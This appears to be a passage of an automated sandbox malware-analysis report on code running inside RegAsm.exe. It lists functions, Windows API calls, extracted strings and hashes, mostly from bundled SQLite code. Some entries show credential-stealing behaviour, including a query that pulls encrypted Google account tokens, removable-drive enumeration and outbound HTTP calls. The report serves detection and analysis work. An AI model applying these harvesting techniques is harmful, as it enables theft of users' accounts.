                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcatmemset$AllocateConnectFileOptionSendSystemTimelstrlen
                                                    • String ID: .exe$C:\Program Files (x86)\Internet Explorer\ielowutil.exe$rBA$rBA
                                                    • API String ID: 54917473-2241296711
                                                    • Opcode ID: 0c9e794474cbd8b9f959dc737bd49f21f3e301095ee32192b0151e9f2087f051
                                                    • Instruction ID: 6e0f2c16cacc39a04d56a59c7a2eb00cd39a9aaba75bb456b19badbc384f9bd3
                                                    • Opcode Fuzzy Hash: 0c9e794474cbd8b9f959dc737bd49f21f3e301095ee32192b0151e9f2087f051
                                                    • Instruction Fuzzy Hash: 9E515371E00318ABDB10EBA1DC52BED7378AB10305F60406FF616A21D1DB795B89CF59
                                                    Function 1FA29DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [%!g,%!g],$[%!g,%!g]]
                                                    • API String ID: 0-3388633204
                                                    • Opcode ID: 113bdc7d54bd5de70cae0fa5a164f0707397aac7c2dcd618b7034b86ed6cce69
                                                    • Instruction ID: c9a856f28000e9bb99d4029a9f05e74608bdd96b5f3b7afc659741caa8e9a500
                                                    • Opcode Fuzzy Hash: 113bdc7d54bd5de70cae0fa5a164f0707397aac7c2dcd618b7034b86ed6cce69
                                                    • Instruction Fuzzy Hash: F4514630A047029BD700CF29CCC0B97B7F5AF4A7A0F404669F94A9A240F77EB555DBA2
                                                    Function 1FA4F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • malformed inverted index for FTS%d table %s.%s, xrefs: 1FA4F3F3
                                                    • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1FA4F33F
                                                    • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1FA4F418
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                    • API String ID: 0-2809892521
                                                    • Opcode ID: 2ca72420d95dd163459e0cc4305ab6578d064f36bdf8a2016377ab9923bfcf19
                                                    • Instruction ID: a707cf91a8f71dcbe5cfa839e2f87bd7b047116204bf94a335a615a38dbc9d84
                                                    • Opcode Fuzzy Hash: 2ca72420d95dd163459e0cc4305ab6578d064f36bdf8a2016377ab9923bfcf19
                                                    • Instruction Fuzzy Hash: 154119B15092229BD710DB26DC8CADB37ACEF41775F140469FE05C7240E73EA165EBA1
                                                    Function 00416A75 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(?), ref: 00416A7B
                                                    • memset.MSVCRT ref: 00416AB0
                                                    • GetDriveTypeA.KERNEL32(?), ref: 00416ACA
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416AF5
                                                      • Part of subcall function 004133A2: StrStrA.SHLWAPI(?,?,?,?,00414C10,?,00000000), ref: 004133AC
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B1D
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B35
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B5D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$DriveTypelstrlenmemset
                                                    • String ID: %DRIVE_REMOVABLE%$lA
                                                    • API String ID: 2639794215-3429080066
                                                    • Opcode ID: a8ee40e0d1b07a0685d1cd63947ad5e4342cde52dfa35eb57268763b7acb9308
                                                    • Instruction ID: c9cf622a35b6895bce40c4c662a0522535cfb9cd2736c84f33ab931169bf0e59
                                                    • Opcode Fuzzy Hash: a8ee40e0d1b07a0685d1cd63947ad5e4342cde52dfa35eb57268763b7acb9308
                                                    • Instruction Fuzzy Hash: 712148B1904118ABDF20AF70CC45BED7BB8BB15304F5040AAB65EE6161DF399AC9CF18
                                                    Function 1FA430F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d211a70dd9546ee4a924dc17a5d612feae6c5f0764661e941ca87c64ad7e0efc
                                                    • Instruction ID: a4e420bec3bb12ed7855af047e89300686d55d611247d1f2ab608296331d3df9
                                                    • Opcode Fuzzy Hash: d211a70dd9546ee4a924dc17a5d612feae6c5f0764661e941ca87c64ad7e0efc
                                                    • Instruction Fuzzy Hash: 94517275608301AFDB40EF68FC04E9B7BE2EF85320F1945A8F1588B2B1E336E9519B41
                                                    Function 1FA3B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edb10275622e5fa9e591a4518a83a1545d5a5564f75bfd8f40387b01c0b5d797
                                                    • Instruction ID: fc5a00a28edbd25e3c388d5a84610f15269e8c87207f97617d4d542080c95b91
                                                    • Opcode Fuzzy Hash: edb10275622e5fa9e591a4518a83a1545d5a5564f75bfd8f40387b01c0b5d797
                                                    • Instruction Fuzzy Hash: 651196FDD042007FD7049B14ED41E6B77EAEF91600F840499F84587221E73EFA1992A2
                                                    Function 1FA97920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                    • Instruction ID: 884b322f92260a4d8b0cafa8ac5cec4d1d2834d1639c30455253a884c93429d6
                                                    • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                    • Instruction Fuzzy Hash: ABB19CB5A04302ABC704DF29CD80A5ABBE5FF88214F444939F949D7711E73DF9648BA1
                                                    Function 00409C1A Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 265stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409E0A
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00409E36
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409F0D
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409F21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                    • String ID: AccountId$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                    • API String ID: 3306365304-465000181
                                                    • Opcode ID: 5bc696806b497ab0423ea5bfc07e34e3275cbdb623a122d363852225f6480c86
                                                    • Instruction ID: 77dc25ccb64a9070525839547ae20bab8b4c21683db2df3dfd4faf0e6278306d
                                                    • Opcode Fuzzy Hash: 5bc696806b497ab0423ea5bfc07e34e3275cbdb623a122d363852225f6480c86
                                                    • Instruction Fuzzy Hash: 4EA1EC72900118AADF04FBA1DD96EED7779EF14305F50016EF216B21F1EF399A88CA58
                                                    Function 1FA35930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                    • API String ID: 0-2679805236
                                                    • Opcode ID: be4c94ccddcdf27aafe9742eedb07089d8434b3da4df113571c449d57359694f
                                                    • Instruction ID: cf2c7ac362fbe739cd0c63a31e96797de7e3b5996813193813ea73ea53622dc9
                                                    • Opcode Fuzzy Hash: be4c94ccddcdf27aafe9742eedb07089d8434b3da4df113571c449d57359694f
                                                    • Instruction Fuzzy Hash: 0B71B071E043478FC700CF29D884A9AB7E5AFC4365F050569E989D7201FB7EE905CB92
                                                    Function 1FB3F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                    • API String ID: 0-3864549341
                                                    • Opcode ID: 394a768806f457ac5c27136f44965163aec5a3acb62638b9ff3658401f75f478
                                                    • Instruction ID: 52e979105d154e8f8edf1d0809d6779b1e52da485386a142d6a866f392481357
                                                    • Opcode Fuzzy Hash: 394a768806f457ac5c27136f44965163aec5a3acb62638b9ff3658401f75f478
                                                    • Instruction Fuzzy Hash: 386165B5EC0B02ABE7058F20FC45BD777A4EF41706F004228F8995A682E7B9F15687A1
                                                    Function 1FA43F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                    • API String ID: 0-131617836
                                                    • Opcode ID: d885cfe3cf4367f4e1649dbd56b1817b7eb8ed1095f5c6dcf6b049613b717c6b
                                                    • Instruction ID: a76f236edb4e4e12ea9b6c0deba837a339255f4ce9f40ba54c9bd56b213a47ea
                                                    • Opcode Fuzzy Hash: d885cfe3cf4367f4e1649dbd56b1817b7eb8ed1095f5c6dcf6b049613b717c6b
                                                    • Instruction Fuzzy Hash: A4510776A042828BD301DF18D44076AB7B1BF82324FAD41A8EC865F645D73EFD96CB51
                                                    Function 1FA41120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: main$rbu_memory
                                                    • API String ID: 0-3973752345
                                                    • Opcode ID: 8ff282c5b98d7bdffee04a53b3a73b9a54964e7fb5cb0ba358e8ba77195af243
                                                    • Instruction ID: e500a480bc248b221b66e6c423cf7cb295e2b4c21dc40f31cf640d9b083e350e
                                                    • Opcode Fuzzy Hash: 8ff282c5b98d7bdffee04a53b3a73b9a54964e7fb5cb0ba358e8ba77195af243
                                                    • Instruction Fuzzy Hash: 7E51BC757043029BDB018F6AD880B9AB3E8AF84324F284479E945D7341EB3EF915CB91
                                                    Function 1FA38C40 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1FA38D35
                                                    • winAccess, xrefs: 1FA38D60
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
